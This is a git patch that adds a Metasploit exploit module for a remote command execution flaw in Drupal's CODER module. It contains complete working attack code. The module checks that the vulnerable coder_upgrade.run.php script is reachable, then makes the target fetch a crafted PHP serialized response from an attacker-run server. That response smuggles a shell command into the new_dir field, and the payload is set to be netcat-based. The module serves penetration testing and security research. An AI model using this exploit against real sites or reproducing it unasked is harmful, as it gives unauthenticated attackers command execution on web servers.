From 634ee93de4219e9260a3afab697d276401c7bb50 Mon Sep 17 00:00:00 2001 From: Mehmet Ince Date: Thu, 21 Jul 2016 20:23:54 +0300 Subject: [PATCH] Add Drupal CODER remote command execution --- .../exploits/unix/webapp/drupal_coder_exec.rb | 105 ++++++++++++++++++ 1 file changed, 105 insertions(+) create mode 100644 modules/exploits/unix/webapp/drupal_coder_exec.rb diff --git a/modules/exploits/unix/webapp/drupal_coder_exec.rb b/modules/exploits/unix/webapp/drupal_coder_exec.rb new file mode 100644 index 0000000000..bd48b049ab --- /dev/null +++ b/modules/exploits/unix/webapp/drupal_coder_exec.rb @@ -0,0 +1,105 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + include Msf::Exploit::Remote::HttpServer + + def initialize(info={}) + super(update_info(info, + 'Name' => 'Drupal CODER Module Remote Command Execution', + 'Description' => %q{ + This module exploits a Remote Command Execution vulnerability in + Drupal CODER Module. Unauthenticated users can execute arbitrary command + under the context of the web server user. + + CODER module doesn't sufficiently validate user inputs in a script file + that has the php extension. A malicious unauthenticated user can make + requests directly to this file to execute arbitrary command. + The module does not need to be enabled for this to be exploited + + This module was tested against CODER 2.5 with Drupal 7.5 installation on Ubuntu server. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Nicky Bloor', # discovery + 'Mehmet Ince ' # msf module + ], + 'References' => + [ + ['URL', 'https://www.drupal.org/node/2765575'] + ], + 'Privileged' => false, + 'Payload' => + { + 'BadChars' => "\x00\x2f", + 'Compat' => + { + 'PayloadType' => 'cmd', + 'RequiredCmd' => 'netcat netcat-e' + }, + }, + 'Platform' => ['unix'], + 'Arch' => ARCH_CMD, + 'Targets' => [ ['Automatic', {}] ], + 'DisclosureDate' => 'Jul 13 2016', + 'DefaultTarget' => 0 + )) + + register_options( + [ + OptString.new('TARGETURI', [true, 'The target URI of the Drupal installation', '/']), + OptString.new('SRVHOST', [true, 'Bogus web server host to receive request from target and deliver payload']), + OptString.new('SRVPORT', [true, 'Bogus web server port to listen']), + ] + ) + end + + def check + res = send_request_cgi( + 'method' => 'GET', + 'uri' => normalize_uri(target_uri.path, 'sites/all/modules/coder/coder_upgrade/scripts/coder_upgrade.run.php'), + ) + if res && res.code == 200 + Exploit::CheckCode::Vulnerable + else + Exploit::CheckCode::Safe + end + end + + def on_request_uri(cli, _request) + print_status("Incoming request detected...") + p = '' + p << 'a:6:{s:5:"paths";a:3:{s:12:"modules_base";s:8:"../../..";s:10:"files_base";s:5:"../..";s:14:"libraries_base";s:5:"../..";}' + p << 's:11:"theme_cache";s:16:"theme_cache_test";' + p << 's:9:"variables";s:14:"variables_test";' + p << 's:8:"upgrades";a:1:{i:0;a:2:{s:4:"path";s:2:"..";s:6:"module";s:3:"foo";}}' + p << 's:10:"extensions";a:1:{s:3:"php";s:3:"php";}' + p << 's:5:"items";a:1:{i:0;a:3:{s:7:"old_dir";s:12:"../../images";' + p << 's:7:"new_dir";s:' + p << (payload.encoded.length + 14).to_s + p << ':"f --help && ' + p << payload.encoded + p << ' #";s:4:"name";s:4:"test";}}}' + print_status("Sending payload...") + send_response(cli, p) + end + + def exploit + start_service + send_request_cgi( + 'method' => 'GET', + 'uri' => normalize_uri(target_uri.path, 'sites/all/modules/coder/coder_upgrade/scripts/coder_upgrade.run.php'), + 'encode_params' => false, + 'vars_get' => { + 'file' => get_uri + } + ) + stop_service + end +end